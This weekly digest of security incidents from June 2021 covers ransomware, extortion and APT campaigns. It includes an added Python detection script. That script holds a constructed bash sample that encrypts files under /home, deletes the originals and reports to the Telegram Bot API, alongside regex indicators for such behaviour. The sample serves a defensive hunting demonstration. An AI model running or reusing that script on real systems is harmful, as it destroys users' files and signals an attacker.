Overview of security incidents for the period 19-25 June 2021
Microsoft Security Intelligence has warned users about an ongoing malicious campaign, BazaCall, whose operators are ultimately trying to install ransomware on victims' systems. The BazaCall emails ask recipients to call a specified phone number to cancel a supposed subscription to a service; callers reach a fraudulent call centre run by the attackers. The operators then direct the victim to a specific website and have them download a Microsoft Excel file to "complete" the cancellation. The file contains a malicious macro that downloads malware. Because the email itself carries no link or attachment, the lure slips past controls that key on URLs and attachments; the phone call is the delivery channel.
A number of organizations in the oil, gas and food sectors have received threatening emails from criminals posing as DarkSide. According to Trend Micro researchers, the attackers are trading on the notoriety of the DarkSide ransomware (the name, not the malware) to run a social-engineering intimidation campaign. The emails claim that the group has compromised the company's corporate network and stolen confidential information, and that the stolen data will be published unless the company pays a ransom of 100 bitcoins (roughly $3.8 million).
Trend Micro also warned of new ransomware called DarkRadiation, which targets Red Hat/CentOS and Debian Linux distributions. The operators use the Telegram messenger API to communicate with their C&C server. The malware encrypts files in various directories with AES (Advanced Encryption Standard) in CBC mode. The distribution method is currently unknown, and there is no evidence yet of the ransomware being used in real attacks.
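The two traits the report names, AES-CBC file encryption and a Telegram C&C channel, are each common on their own but rarely appear together in legitimate administration scripts, which makes the pairing a useful hunting signal on Linux hosts. The script below is an added example, not DarkRadiation's code or Trend Micro's detection logic. It assumes the malware invokes the `openssl enc` command line with an `aes-*-cbc` cipher and reaches Telegram through `https://api.telegram.org/bot<token>/`; neither detail is stated on the page. Both input scripts are constructed for the demo.

```python
"""Hunt shell scripts that pair OpenSSL AES-CBC encryption with Telegram Bot API calls.

Added example; assumes (not stated on the page) that the malware shells out to
`openssl enc -aes-*-cbc` and calls https://api.telegram.org/bot<token>/.
"""
import re
from pathlib import Path

# Indicator patterns. Each alone is weak evidence; the verdict needs the pair.
PATTERNS = {
    # `openssl enc ... -aes-128/192/256-cbc` on one command line
    "openssl_aes_cbc": re.compile(r"openssl\s+enc\b[^\n]*-aes-(128|192|256)-cbc", re.I),
    # Telegram Bot API endpoint; the token may be a literal or a shell variable
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
    # Bot token shape (<numeric id>:<alphanumeric secret>) anywhere in the script
    "telegram_bot_token": re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{20,}\b"),
    # Walking user or service data trees with find, typical of file-encrypting scripts
    "recursive_target_walk": re.compile(r"\bfind\s+/(home|var|root|opt)\b"),
}


def score_script(text: str) -> dict:
    """Return which indicators matched and a verdict.

    'suspicious' only when both the AES-CBC encryption and the Telegram channel
    are present; an encrypted backup job matches the first but not the second.
    """
    hits = {name: bool(rx.search(text)) for name, rx in PATTERNS.items()}
    verdict = "suspicious" if hits["openssl_aes_cbc"] and hits["telegram_bot_api"] else "benign"
    return {"hits": hits, "verdict": verdict}


def scan_paths(paths) -> dict:
    """Score every script at the given paths (utility for real use; not exercised below)."""
    return {str(p): score_script(Path(p).read_text(errors="replace")) for p in paths}


# Constructed sample mimicking the described behaviour; not real malware.
CONSTRUCTED_SAMPLE = r"""#!/bin/bash
TOKEN="123456789:AAExampleTokenExampleToken"
for f in $(find /home -type f -name '*.txt'); do
  openssl enc -aes-256-cbc -salt -pbkdf2 -pass pass:"$KEY" -in "$f" -out "$f.enc" && rm -f "$f"
done
curl -s "https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$CHAT&text=done"
"""

# Constructed benign script: legitimate AES-CBC backup with no C&C channel.
BENIGN_BACKUP = r"""#!/bin/bash
tar czf /tmp/backup.tgz /etc
openssl enc -aes-256-cbc -pbkdf2 -pass file:/root/.backup.key -in /tmp/backup.tgz -out /srv/backup.tgz.enc
"""

if __name__ == "__main__":
    for name, text in (("sample", CONSTRUCTED_SAMPLE), ("backup", BENIGN_BACKUP)):
        print(name, score_script(text))
```

Run it over `/etc/cron.*`, `/usr/local/bin` and any script dropped in `/tmp` or `/dev/shm`; a hit on the pair is worth a look even before the distribution vector is known, since the encryption routine and the callback are what the report describes.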
The Clop ransomware gang has resurfaced despite the arrests of group members by Ukrainian police last week: a new victim has appeared on Clop's leak site. The published data are employee records of an as-yet unidentified company, including proof-of-employment documents for loan applications and other paperwork.
Liège, the third-largest city in Belgium, has also been hit by ransomware. The attack took down the municipality's IT network and online services. All appointments at the city administration, weddings, funerals and the issuance of birth certificates were cancelled because civil servants lost access to the city's network, and the online forms for public-event and parking permits were also unavailable.
Ransomware also hit the Lucky Star casino chain in Oklahoma. Since almost all casino games are now computerized in one way or another, security experts suggest the ransomware operators caused serious disruption to the venues' computer systems.
Network equipment vendor Zyxel has warned its customers about a series of attacks on Zyxel's corporate firewalls and VPN gateways. The attackers are targeting multipurpose network devices of the USG, ZyWALL, USG FLEX, ATP and VPN series running the ZLD firmware. It is not yet clear how the attackers gain access to the devices, whether through known vulnerabilities or a previously unknown flaw. Until that is established, the usual exposure reduction applies: keep the management interface unreachable from the WAN side and restrict VPN logins by source address.
Daewoo Shipbuilding & Marine Engineering, a major South Korean shipbuilder that also produces naval vessels, has been hacked by unknown attackers. The company reported the incident to the police, who are investigating it together with the military.
Black Lotus Labs has discovered a new remote access Trojan, ReverseRat, targeting government and energy organizations in South and Central Asia. The group's operational infrastructure is believed to be located in Pakistan. In analysing the campaign, the researchers identified overlaps with the tactics, techniques and procedures of Operation SideCopy, attributed last year to the Pakistan-based APT group Transparent Tribe, but did not say whether the two activity clusters are related.
Recorded Future's Insikt Group has identified a link between the hacker group RedFoxtrot and the Chinese People's Liberation Army, specifically Unit 69010, which operates from Ürümqi, the administrative centre of the Xinjiang Uyghur Autonomous Region. Unit 69010 is a technical reconnaissance bureau that sits under the Network Systems Department of the PLA Strategic Support Force (SSF); the SSF includes units responsible for space, cyber and electronic warfare.
Hackers from the Anonymous collective accused the Peruvian authorities, in particular interim president Francisco Sagasti and the National Jury of Elections (JNE), of bias in the presidential election, and threatened JNE head Jorge Salas Arenas with the publication of compromising material unless he resigns.